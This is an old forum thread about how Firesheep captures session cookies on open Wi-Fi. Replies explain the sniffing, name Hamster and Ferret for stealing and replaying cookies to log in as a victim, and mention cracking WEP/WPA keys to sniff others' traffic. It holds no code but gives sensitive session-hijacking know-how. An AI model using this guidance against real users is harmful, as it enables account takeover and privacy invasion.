billyblaxsta Posted August 16, 2011 Share Posted August 16, 2011 Hi, I have a couple of questions about Firesheep. AIUI, it works when - although the logon is HTTPS - the cookie sent by the server immediately after the logon is finished is sent through HTTP. Therefore, Firesheep is defeated by constant HTTPS (as can happen in Gmail and Facebook for example). What I do not understand having read (http://codebutler.com/firesheep) is whether the Firesheep user is operating as a MITM in order to obtain the session cookie. In the episode (http://hak5.org/episodes/episode-906) it looks as if Shannon is using Cain to ARPspoof Darren before using Firesheep. However, there is no mention of ARPspoofing on the coder's site and instead he says "On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy." Is this really the situation? Why would a cookie be sent to anyone on the wireless network rather than to the actual client who has just logged in? And, therefore, how exactly does Firesheep obtain the session cookie? Thanks. Quote Link to comment Share on other sites More sharing options...
digip Posted August 16, 2011 Share Posted August 16, 2011 (edited) Better to use hamster and ferret, as it doesn't require a site profile to grab the cookies. Hamster any ferret will work on any site. Basically its a packet capture tool, kind of like wireshark and tcpdump, but specializes in pulling the cookies out of the packets and associating them with the site they came from. You can then dump them to your browser and login as the end user. You could also do this manually with wireshark and a card in monitor mode on an unencrypted network, but its a pain in the ass to have to enter them all by hand when tools do it for you. Edited August 16, 2011 by digip Quote Link to comment Share on other sites More sharing options...
Terror Factor Posted August 16, 2011 Share Posted August 16, 2011 On wired networks or wpa enterprise networks you need to do a mitm first. WiFi networks work like a hub, everyone receives the traffic(you can't direct those radiowaves to every client individually), so on open networks you can get those cookies(and all other traffic of course!), on WEP networks you can do the same if you know/crack the password, and on WPA networks you can do the same if you know/crack the password AND capture the handshake of the user(s) who you are trying to sniff. The cookie itself is just sent in plain text(you can verify this with wireshark), so if you can see the traffic, you can see the cookie. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.